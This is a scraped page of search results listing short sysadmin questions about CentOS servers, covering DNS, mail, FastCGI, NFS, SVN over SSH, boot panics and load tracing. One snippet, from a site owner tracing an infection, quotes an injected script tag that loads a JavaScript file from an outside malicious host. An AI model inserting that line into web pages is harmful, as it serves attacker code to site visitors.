Search Results

Search found 3039 results on 122 pages for 'centos'.

Page 77/122 | < Previous Page | 73 74 75 76 77 78 79 80 81 82 83 84  | Next Page >

  • JS Worm : how to find the entry point

    - by Cédric Girard
    Hi, my site is tagged as dangerous by Google / StopBadware.org, and I found this in severals js/html files : <script type="text/javascript" src="http://oployau.fancountblogger.com:8080/Gigahertz.js"></script> <!--a0e2c33acd6c12bdc9e3f3ba50c98197--> I cleaned severals files, I restore a backup but how to understand how the worm had been installed? What can I look for in log files? This server, a Centos 5, is only used as an apache server, with ours programs, a tikiwiki, a drupal installed. Thanks Cédric

    Read the article

  • Website doesn't work when missing "www"

    - by jeff
    Hello everyone, Does anyone know the solution to this problem? I checked my zone file and there are 2 A records mydomainname.com. 14400 IN A ip.address.x.x localhost 14400 IN A 127.0.0.1 I'm On CentOs 5.2, by the way. Thanks for the help!!

    Read the article

  • How do I setup Gmail for my VPS?

    - by user41010
    Hi, I'm using a Hostgator VPS running CentOS 5. I only have shell access (no control panel). I'm supposed to change my MX records and add a CNAME record for verification. What should I do? I know it would have been really easy through some kind of a control panel but I really haven't been provided one. Thanks in advance.

    Read the article

  • PHP fastcgi handler dont work

    - by user1260968
    I have CentOS server ( Server version: Apache/2.2.15 (Unix) Server built: Feb 13 2012 22:31:42 ) with mod_fastcgi.x86_64(2.4.6-2.el6.rf) and php 5.3.3. some sites not work on fastcgi mode. In apache error.log: [Mon Sep 03 19:20:37 2012] [warn] [client 80.*.*.*] (104)Connection reset by peer: mod_fcgid: error reading data from FastCGI server [Mon Sep 03 19:20:37 2012] [error] [client 80.*.*.*] Premature end of script headers: index.php Can anybody tell me how solve this?

    Read the article

  • trace server load? how to

    - by Clear.Cache
    My server (Centos 4.8) keeps shooting up in load. Its a shared hosting server with Cpanel/WHM. How can I trace the process/user causing this ongoing problem? I use top, but it shows nothing that stands out for a particular script from a particular user. I have suPHP enabled with PHP 5.3x and MySQL 5 as well.

    Read the article

  • NFS server is ignoring anonuid?

    - by paszczak000
    On NFS server I've got user with UID=1024 and GID=1204. On client side too. Both servers are CentOS 6.4 (2.6.32-358.2.1.el6.x86_64). Right now anonuid/anongid is not working. Files aren't mapped to 1024 uid but to 99 (nobody:x:99:99:Nobody:/:/sbin/nologin). /etc/exports /vol/test10.xxx.xxx.xxx(rw,all_squash,anonuid=1024,anongid=1024) /etc/fstab 10.xxx.xxx.xxx:/vol/test /nas/test nfs nosuid,intr,defaults,_netdev,intr 0 0

    Read the article

  • How much it costs to tun own hosting server

    - by Mirage
    I currently have VPS in my company and there i host about 20 websites. My copany wants to set up server locally where they can host all websites rtaher using 3rd party VPS How it will cost e,g about upload ,download speed from data centre. Cpanels license IP registration, hardware , backups, electricity backups, Any other cots etc I would prefer centos

    Read the article

  • where to put core services in two-node cluster

    - by Veniamin
    I'm currently configuring two-node HA cluster based on CentOS with DRBD. Most services are packed in virtual machines with migration available. I have not made decision where to put some core services as: dhcp, ldap, dns - which are critical for all network infrastructure. There are two possibilities: Configure them as redundant HA services on cluster hosts. Pack them all into dedicated virtual machine. What is the best practice?

    Read the article

  • Encrypt pdf files with mcrypt and php

    - by microchasm
    I'm currently set up with a CentOS box that utilizes mcrypt to encrypt/decrypt data to/from the database. In my haste, I forgot that I also need a solution to encrypt files (primarily pdf, with a xls and txt file here and there). Is there a way to utilize mcrypt to encrypt pdf files? I understand the possibility of file_get_contents() with txt; is a similar solution available for other formats? Thanks!

    Read the article

  • Name of log file where boot process is logged

    - by ant2009
    Hello, CentOS 5.3 After booting up. I am wondering what is the name of the log file that contains if all services where successfully loaded or not? For example when computer boots you get a list of start services and they can be OK or FAILED. Is there a log file where this information is kept? I had a look in the following directory /var/log/ but not sure which one will contain the informaiton that I need. Many thanks for any advice,

    Read the article

  • pam_unix(sshd:session) session opened for user NOT ROOT by (uid=0), then closes immediately using using TortiseSVN

    - by codewaggle
    I'm having problems accessing an SVN repository using TortoiseSVN 1.7.8. The SVN repository is on a CentOS 6.3 box and appears to be functioning correctly. # svnadmin --version # svnadmin, version 1.6.11 (r934486) I can access the repository from another CentOS box with this command: svn list svn+ssh://[email protected]/var/svn/joetest But when I attempt to browse the repository using TortiseSVN from a Win 7 workstation I'm unable to do so using the following path: svn+ssh://[email protected]/var/svn/joetest I'm able to login via SSH from the workstation using Putty. The results are the same if I attempt access as root. I've given ownership of the repository to USER:USER and ran chmod 2700 -R /var/svn/. Because I can access the repository via ssh from another Linux box, permissions don't appear to be the problem. When I watch the log file using tail -fn 2000 /var/log/secure, I see the following each time TortiseSVN asks for the password: Sep 26 17:34:31 dev sshd[30361]: Accepted password for USER from xx.xxx.xx.xxx port 59101 ssh2 Sep 26 17:34:31 dev sshd[30361]: pam_unix(sshd:session): session opened for user USER by (uid=0) Sep 26 17:34:31 dev sshd[30361]: pam_unix(sshd:session): session closed for user USER I'm actually able to login, but the session is then closed immediately. It caught my eye that the session is being opened for USER by root (uid=0), which may be correct, but I'll mention it in case it has something to do with the problem. I looked into modifying the svnserve.conf, but as far as I can tell, it's not used when accessing the repository via svn+ssh, a private svnserve instance is created for each log in via this method. From the manual: There's still a third way to invoke svnserve, and that's in “tunnel mode”, with the -t option. This mode assumes that a remote-service program such as RSH or SSH has successfully authenticated a user and is now invoking a private svnserve process as that user. The svnserve program behaves normally (communicating via stdin and stdout), and assumes that the traffic is being automatically redirected over some sort of tunnel back to the client. When svnserve is invoked by a tunnel agent like this, be sure that the authenticated user has full read and write access to the repository database files. (See Servers and Permissions: A Word of Warning.) It's essentially the same as a local user accessing the repository via file:/// URLs. The only non-default settings in sshd_config are: Protocol 2 # to disable Protocol 1 SyslogFacility AUTHPRIV ChallengeResponseAuthentication no GSSAPIAuthentication yes GSSAPICleanupCredentials yes UsePAM yes AcceptEnv LANG LC_CTYPE LC_NUMERIC LC_TIME LC_COLLATE LC_MONETARY LC_MESSAGES AcceptEnv LC_PAPER LC_NAME LC_ADDRESS LC_TELEPHONE LC_MEASUREMENT AcceptEnv LC_IDENTIFICATION LC_ALL LANGUAGE AcceptEnv XMODIFIERS X11Forwarding no Subsystem sftp /usr/libexec/openssh/sftp-server Any thoughts?

    Read the article

  • df shows negative values for used

    - by GriffinHeart
    Hey everyone, first question around here. I have a centos 5.2 server and running df -h i get this: Filesystem Size Used Avail Use% Mounted on /dev/mapper/VolGroup00-LogVol00 672G -551M 638G 0% / /dev/hda1 99M 12M 82M 13% /boot tmpfs 2.0G 0 2.0G 0% /dev/shm that space wasn't even near 10% usage the last time it showed a correct value, i'm at a loss with whats going on. Thanks.

    Read the article

  • Mail server Backup script

    - by Paul Stevens
    Hello, Im looking for the best way to accomplish a full backup of our "vmail" accounts on our mail server (CentOS "iRedMail" 5.1). I also need to split on 4GB parts the resulting tar or bzip compressed backup, and get this DVD-RW burned, on same server. The idea is to get this procedure to running overnight, once a week. Our mail server holds about 45GB of information. I will appreciate any advise or help on this topic. Thanks.

    Read the article

  • sendmail: how to add X-RBL-Warning

    - by John
    I am running sendmail on CentOS. I am interested if anyone knows how to add a X-RBL-Warning for incoming messages (without rejecting the mail). I just want to add the X-RBL-Warning header so that our downstream filters can work with it. Thanks, John

    Read the article

  • Windows: redirect stdout and stderror to nothing

    - by Ramblingwood
    I have a command I am running produces a ton of output, I want to silence the output without writing to a file. I have used the following to send all output to a file, but again I don't want any file output: command > out.txt 2>&1 I have used command > /bin/null on my CentOS box before, but I can't find a similar thing for windows.

    Read the article

  • How do I update YUM repositories?

    - by JM4
    I am very, very new to all this so baby steps please if helping is appreciated. I am trying to connect to the following repository so I can update my YUM packages: http://repo.webtatic.com/yum/centos/5/SRPMS/ honestly I have no idea how to do that from SSH though - any guidance is very appreciative.

    Read the article

  • ssh connectivity issue

    - by achal tomar
    I have a CentOS 5.5 server hosted in a remote data center. I usually access this server from a Red Hat Enterprise Linux 5 server using the ssh command. Now my organization has implemented a proxy server, this is not allowing me to connect to the VPS server. I see the following error using the command root@<ip address>:-: ssh: connect to host <ip address> PORT 22: connection refused. Can anybody help me with this issue?

    Read the article

  • Reattaching screen (having irssi running) forces window resize

    - by eis
    Whenever I reattach to my detached screen (containing Irssi), my Putty screen is resized to something it has been at startup. If I change the window size after this, detach the screen and resize it back, window will be again resized to the original size. By window I mean the Putty window on my windows box. How can I turn this feature off? Using Windows XP as my local and CentOS 6.0 as the remote OS. Putty 0.61.

    Read the article

  • Broadcom HT1100 SATA controller not working properly with 1TB drives

    - by Jeff C
    I've been using RHEL distro's for several years and always managed to find the answers until now. I know this is more of a hardware issue, but I've been working on this for over a week and trust Linux and the IT community to help more then HP. I have CentOS 6.3 installed on an HP ProLiant DL145 G3 server with the BroadCom HT1100 IO controller and ServerWorks SATA Controller MMIO BIOS v3.0.0015.6 Firmware. This controller does not support large drives fully. Here's what I've tried and the results; Stock setup - Freezes on the ServerWorks POST screen. Can't even enter CMOS without disconnecting the drives. If I simply disconnect the SATA cables before it gets to the ServerWorks screen and reconnect afterwards I can boot from a CD, USB, PXE fine. However fiddling with cables at ever boot isn't practical. If I enter the BIOS config I can set it to not try booting the drives but leave the controller enabled. This lets me boot normally but the drives are not visible in the OS (live CDs or USB installed). I used method #2 to install and update CentOS. I have the /boot partition on a USB drive (everything else is on the SATA drives in software RAID1) hoping that would work around the issue but I get this Kernel panic - not syncing:Attempted to kill init! Pid: 1, comm: init Not tainted 2.6.32-279.9.1.el6.x86_6 #1 Call Trace: [<ffffffff814fd6ba>] ? panic+0xa0/0x168 [<ffffffff81070c22>] ? do_exit+0x862/0x870 [<ffffffff8117cdb5>] ? fput+0x25/0x30 [<ffffffff81070c88>] ? do_group_exit+0x58/0xd0 [<ffffffff81070d17>] ? sys_exit_group+0x17/0x20 [<ffffffff8100b0f2>] ? system_call_fastpath+0x16/0x1b panic occured, switching back to text console I'm sure it should be possible to talk to the drives without the BIOS boot check since the BIOS doesn't see them in method #2 either, their disconnected when it checks, but Linux sees them fine. If anyone could help figure out how I would greatly appreciate it! The other possible option I've come across is a complex firmware update. Tyan has a few boards on their website with the HT1100 and a ServerWorks v3.0.0015.7 update which says "adds support for TB drives" in the release notes. If someone could help me get the Tyan SATA firmware into the HP ROM file so I could just reflash that would also be very much appreciated. Thanks for any help you guys can offer!

    Read the article

< Previous Page | 73 74 75 76 77 78 79 80 81 82 83 84  | Next Page >